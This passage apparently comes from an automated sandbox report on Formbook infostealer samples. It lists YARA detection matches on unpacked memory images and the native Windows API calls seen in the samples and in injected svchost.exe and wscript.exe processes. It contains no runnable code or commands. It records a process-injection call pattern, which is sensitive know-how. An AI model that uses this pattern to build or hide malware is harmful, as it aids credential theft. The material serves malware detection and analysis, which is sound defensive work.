          Source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 0_2_00467724 NtdllDefWindowProc_A,0_2_00467724
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 0_2_0045CA34 GetSubMenu,SaveDC,RestoreDC,7337B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_0045CA34
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 0_2_0044CEA0 NtdllDefWindowProc_A,GetCapture,0_2_0044CEA0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 0_2_0042D764 NtdllDefWindowProc_A,0_2_0042D764
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 0_2_00467ECC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00467ECC
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 0_2_00467F7C IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_00467F7C
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00416B50 NtCreateFile,3_2_00416B50
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00416C00 NtReadFile,3_2_00416C00
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00416C80 NtClose,3_2_00416C80
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00416D30 NtAllocateVirtualMemory,3_2_00416D30
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00416B4D NtCreateFile,3_2_00416B4D
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00416C7A NtClose,3_2_00416C7A
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA2D0 NtClose,LdrInitializeThunk,3_2_00AAA2D0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA240 NtReadFile,LdrInitializeThunk,3_2_00AAA240
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA3E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00AAA3E0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA360 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00AAA360
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA4A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00AAA4A0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA480 NtMapViewOfSection,LdrInitializeThunk,3_2_00AAA480
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA410 NtQueryInformationToken,LdrInitializeThunk,3_2_00AAA410
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA5F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00AAA5F0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA560 NtQuerySystemInformation,LdrInitializeThunk,3_2_00AAA560
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA540 NtDelayExecution,LdrInitializeThunk,3_2_00AAA540
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA6A0 NtCreateSection,LdrInitializeThunk,3_2_00AAA6A0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA610 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00AAA610
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA720 NtResumeThread,LdrInitializeThunk,3_2_00AAA720
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA700 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00AAA700
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA750 NtCreateFile,LdrInitializeThunk,3_2_00AAA750
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAB0B0 NtGetContextThread,3_2_00AAB0B0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA800 NtSetValueKey,3_2_00AAA800
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA2F0 NtQueryInformationFile,3_2_00AAA2F0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA220 NtWaitForSingleObject,3_2_00AAA220
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AABA30 NtSetContextThread,3_2_00AABA30
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA260 NtWriteFile,3_2_00AAA260
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA3D0 NtCreateKey,3_2_00AAA3D0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA310 NtEnumerateValueKey,3_2_00AAA310
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA370 NtQueryInformationProcess,3_2_00AAA370
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA350 NtQueryValueKey,3_2_00AAA350
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAACE0 NtCreateMutant,3_2_00AAACE0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA430 NtQueryVirtualMemory,3_2_00AAA430
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAB410 NtOpenProcessToken,3_2_00AAB410
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA460 NtOpenProcess,3_2_00AAA460
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA470 NtSetInformationFile,3_2_00AAA470
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAB470 NtOpenThread,3_2_00AAB470
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA5A0 NtWriteVirtualMemory,3_2_00AAA5A0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA520 NtEnumerateKey,3_2_00AAA520
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AABD40 NtSuspendThread,3_2_00AABD40
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA6D0 NtCreateProcessEx,3_2_00AAA6D0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA650 NtQueueApcThread,3_2_00AAA650
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA780 NtOpenDirectoryObject,3_2_00AAA780
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA710 NtQuerySection,3_2_00AAA710
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_1_00416B50 NtCreateFile,3_1_00416B50
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_1_00416C00 NtReadFile,3_1_00416C00
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_1_00416C80 NtClose,3_1_00416C80
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_1_00416D30 NtAllocateVirtualMemory,3_1_00416D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A2D0 NtClose,LdrInitializeThunk,5_2_02F6A2D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A260 NtWriteFile,LdrInitializeThunk,5_2_02F6A260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A240 NtReadFile,LdrInitializeThunk,5_2_02F6A240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A3E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02F6A3E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A3D0 NtCreateKey,LdrInitializeThunk,5_2_02F6A3D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A360 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02F6A360
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A350 NtQueryValueKey,LdrInitializeThunk,5_2_02F6A350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A310 NtEnumerateValueKey,LdrInitializeThunk,5_2_02F6A310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A800 NtSetValueKey,LdrInitializeThunk,5_2_02F6A800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A6A0 NtCreateSection,LdrInitializeThunk,5_2_02F6A6A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A610 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_02F6A610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A750 NtCreateFile,LdrInitializeThunk,5_2_02F6A750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6ACE0 NtCreateMutant,LdrInitializeThunk,5_2_02F6ACE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A480 NtMapViewOfSection,LdrInitializeThunk,5_2_02F6A480
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A470 NtSetInformationFile,LdrInitializeThunk,5_2_02F6A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A410 NtQueryInformationToken,LdrInitializeThunk,5_2_02F6A410
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A560 NtQuerySystemInformation,LdrInitializeThunk,5_2_02F6A560
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A540 NtDelayExecution,LdrInitializeThunk,5_2_02F6A540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A2F0 NtQueryInformationFile,5_2_02F6A2F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6BA30 NtSetContextThread,5_2_02F6BA30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A220 NtWaitForSingleObject,5_2_02F6A220
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A370 NtQueryInformationProcess,5_2_02F6A370
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6B0B0 NtGetContextThread,5_2_02F6B0B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A6D0 NtCreateProcessEx,5_2_02F6A6D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A650 NtQueueApcThread,5_2_02F6A650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A780 NtOpenDirectoryObject,5_2_02F6A780
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A720 NtResumeThread,5_2_02F6A720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A710 NtQuerySection,5_2_02F6A710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A700 NtProtectVirtualMemory,5_2_02F6A700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A4A0 NtUnmapViewOfSection,5_2_02F6A4A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6B470 NtOpenThread,5_2_02F6B470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A460 NtOpenProcess,5_2_02F6A460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A430 NtQueryVirtualMemory,5_2_02F6A430
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6B410 NtOpenProcessToken,5_2_02F6B410
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A5F0 NtReadVirtualMemory,5_2_02F6A5F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A5A0 NtWriteVirtualMemory,5_2_02F6A5A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6BD40 NtSuspendThread,5_2_02F6BD40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_02F6A520 NtEnumerateKey,5_2_02F6A520
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00416B50 NtCreateFile,5_2_00416B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00416C00 NtReadFile,5_2_00416C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00416C80 NtClose,5_2_00416C80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00416D30 NtAllocateVirtualMemory,5_2_00416D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00416B4D NtCreateFile,5_2_00416B4D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00416C7A NtClose,5_2_00416C7A
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 14_2_022B2323 NtUnmapViewOfSection,14_2_022B2323
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 14_2_022B2B39 NtResumeThread,14_2_022B2B39
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 14_2_022B6BE1 NtMapViewOfSection,14_2_022B6BE1
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 14_2_022B51A7 NtQueryInformationProcess,14_2_022B51A7
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 14_2_022B31A6 NtQueryInformationProcess,14_2_022B31A6
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 14_2_022B47C4 NtQueryInformationProcess,14_2_022B47C4
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA2D0 NtClose,LdrInitializeThunk,15_2_00ADA2D0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA240 NtReadFile,LdrInitializeThunk,15_2_00ADA240
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA3E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_00ADA3E0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA360 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_00ADA360
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA4A0 NtUnmapViewOfSection,LdrInitializeThunk,15_2_00ADA4A0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA480 NtMapViewOfSection,LdrInitializeThunk,15_2_00ADA480
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA410 NtQueryInformationToken,LdrInitializeThunk,15_2_00ADA410
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA5F0 NtReadVirtualMemory,LdrInitializeThunk,15_2_00ADA5F0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA560 NtQuerySystemInformation,LdrInitializeThunk,15_2_00ADA560
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA540 NtDelayExecution,LdrInitializeThunk,15_2_00ADA540
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA6A0 NtCreateSection,LdrInitializeThunk,15_2_00ADA6A0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA610 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_00ADA610
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA720 NtResumeThread,LdrInitializeThunk,15_2_00ADA720
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA700 NtProtectVirtualMemory,LdrInitializeThunk,15_2_00ADA700
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA750 NtCreateFile,LdrInitializeThunk,15_2_00ADA750
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADB0B0 NtGetContextThread,15_2_00ADB0B0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA800 NtSetValueKey,15_2_00ADA800
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA2F0 NtQueryInformationFile,15_2_00ADA2F0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA220 NtWaitForSingleObject,15_2_00ADA220
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADBA30 NtSetContextThread,15_2_00ADBA30
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA260 NtWriteFile,15_2_00ADA260
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA3D0 NtCreateKey,15_2_00ADA3D0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA310 NtEnumerateValueKey,15_2_00ADA310
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA370 NtQueryInformationProcess,15_2_00ADA370
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA350 NtQueryValueKey,15_2_00ADA350
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADACE0 NtCreateMutant,15_2_00ADACE0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA430 NtQueryVirtualMemory,15_2_00ADA430
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADB410 NtOpenProcessToken,15_2_00ADB410
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA460 NtOpenProcess,15_2_00ADA460
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADB470 NtOpenThread,15_2_00ADB470
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA470 NtSetInformationFile,15_2_00ADA470
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA5A0 NtWriteVirtualMemory,15_2_00ADA5A0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA520 NtEnumerateKey,15_2_00ADA520
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADBD40 NtSuspendThread,15_2_00ADBD40
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA6D0 NtCreateProcessEx,15_2_00ADA6D0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA650 NtQueueApcThread,15_2_00ADA650
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA780 NtOpenDirectoryObject,15_2_00ADA780
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 15_2_00ADA710 NtQuerySection,15_2_00ADA710
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1ACE0 NtCreateMutant,LdrInitializeThunk,18_2_04A1ACE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A560 NtQuerySystemInformation,LdrInitializeThunk,18_2_04A1A560
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A610 NtAdjustPrivilegesToken,LdrInitializeThunk,18_2_04A1A610
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A2D0 NtClose,LdrInitializeThunk,18_2_04A1A2D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A3E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_04A1A3E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A360 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_04A1A360
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A4A0 NtUnmapViewOfSection,18_2_04A1A4A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A480 NtMapViewOfSection,18_2_04A1A480
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A430 NtQueryVirtualMemory,18_2_04A1A430
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A410 NtQueryInformationToken,18_2_04A1A410
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1B410 NtOpenProcessToken,18_2_04A1B410
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A460 NtOpenProcess,18_2_04A1A460
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1B470 NtOpenThread,18_2_04A1B470
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A470 NtSetInformationFile,18_2_04A1A470
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A5A0 NtWriteVirtualMemory,18_2_04A1A5A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A5F0 NtReadVirtualMemory,18_2_04A1A5F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A520 NtEnumerateKey,18_2_04A1A520
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1BD40 NtSuspendThread,18_2_04A1BD40
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A540 NtDelayExecution,18_2_04A1A540
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A6A0 NtCreateSection,18_2_04A1A6A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A6D0 NtCreateProcessEx,18_2_04A1A6D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A650 NtQueueApcThread,18_2_04A1A650
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A780 NtOpenDirectoryObject,18_2_04A1A780
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A720 NtResumeThread,18_2_04A1A720
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A700 NtProtectVirtualMemory,18_2_04A1A700
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A710 NtQuerySection,18_2_04A1A710
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A750 NtCreateFile,18_2_04A1A750
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1B0B0 NtGetContextThread,18_2_04A1B0B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A800 NtSetValueKey,18_2_04A1A800
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 18_2_04A1A2F0 NtQueryInformationFile,